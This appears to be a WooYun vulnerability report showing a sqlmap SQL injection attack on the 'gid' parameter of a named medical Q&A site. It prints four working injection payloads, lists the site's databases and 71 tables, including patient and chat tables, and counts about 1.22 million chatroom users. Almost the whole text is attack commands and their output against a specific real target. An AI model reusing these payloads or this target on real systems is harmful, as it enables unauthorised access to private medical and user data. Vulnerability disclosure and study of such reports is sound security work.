WooYun.org

注入点：
sqlmap.py -u "http://m.120ask.com/kuaiwen/tongbingxianglian/chatroom?gid=10055&sex=2" -p "gid" --dbs
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Parameter: gid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: gid=10055') AND 2323=2323 AND ('ecNe'='ecNe&sex=2
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY cl
ause
Payload: gid=10055') AND (SELECT 1523 FROM(SELECT COUNT(*),CONCAT(0x716b626b
71,(SELECT (ELT(1523=1523,1))),0x7178767671,FLOOR(RAND(0)*2))x FROM INFORMATION_
SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('rSTg'='rSTg&sex=2
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: gid=10055') AND (SELECT * FROM (SELECT(SLEEP(5)))vfwl) AND ('zdCv'=
'zdCv&sex=2
Type: UNION query
Title: Generic UNION query (NULL) - 17 columns
Payload: gid=-1844') UNION ALL SELECT NULL,CONCAT(0x716b626b71,0x51796b74476
f425a716e,0x7178767671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,N
ULL,NULL,NULL,NULL-- &sex=2
---
[00:42:02] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL 5.0
[00:42:02] [INFO] fetching database names
[00:42:02] [INFO] the SQL query used returns 3 entries
[00:42:02] [INFO] resumed: information_schema
[00:42:02] [INFO] resumed: bingyou
[00:42:02] [INFO] resumed: test
available databases [3]:
[*] bingyou
[*] information_schema
[*] test
表Database: bingyou
[71 tables]
+--------------------------+
| __tj_temp |
| apply_hongbao |
| bingyou_chat |
| chat_day_show_tongji |
| chat_day_tongji |
| chat_log |
| check_filter |
| check_relation |
| check_url |
| gift_pay_log |
| gift_product |
| gift_trade |
| group_level |
| invitation |
| jz_patient |
| jz_salary_log |
| jz_salary_operate |
| jz_salary_out |
| klyq_article |
| klyq_todo |
| klyq_tongji |
| klyq_user |
| kw_tbxl_tongji |
| red_group_giving_log |
| red_packet |
| red_packet_sample |
| red_packet_split |
| red_packet_split_log |
| red_packet_trade |
| red_packet_use |
| sta_jz_chat |
| sta_jz_group |
| sta_jz_reply |
| sta_jz_salary |
| sta_jz_topic |
| sta_percent |
| tongji_daily_focus |
| tousu |
| wx_blacklist |
| wx_tbxl_active_log |
| wx_tbxl_apply_join_group |
| wx_tbxl_chat |
| wx_tbxl_chatroom_msg |
| wx_tbxl_chatroom_user |
| wx_tbxl_group_base |
| wx_tbxl_group_news_con |
| wx_tbxl_group_news_con_0 |
| wx_tbxl_group_news_con_1 |
| wx_tbxl_group_news_con_2 |
| wx_tbxl_group_news_con_3 |
| wx_tbxl_group_news_con_4 |
| wx_tbxl_group_news_con_5 |
| wx_tbxl_group_news_con_6 |
| wx_tbxl_group_news_con_7 |
| wx_tbxl_group_news_con_8 |
| wx_tbxl_group_news_con_9 |
| wx_tbxl_group_user |
| wx_tbxl_msg |
| wx_tbxl_msg_user |
| wx_tbxl_msg_user_0 |
| wx_tbxl_msg_user_1 |
| wx_tbxl_msg_user_2 |
| wx_tbxl_msg_user_3 |
| wx_tbxl_msg_user_4 |
| wx_tbxl_msg_user_5 |
| wx_tbxl_msg_user_6 |
| wx_tbxl_msg_user_7 |
| wx_tbxl_msg_user_8 |
| wx_tbxl_msg_user_9 |
| wx_tbxl_patient |
| wx_tbxl_voice |
+--------------------------+
数量；
select count(1) from wx_tbxl_chatroom_user: '1220314'
[00:54:02] [INFO] fetched data logged to text files
百万级别数量。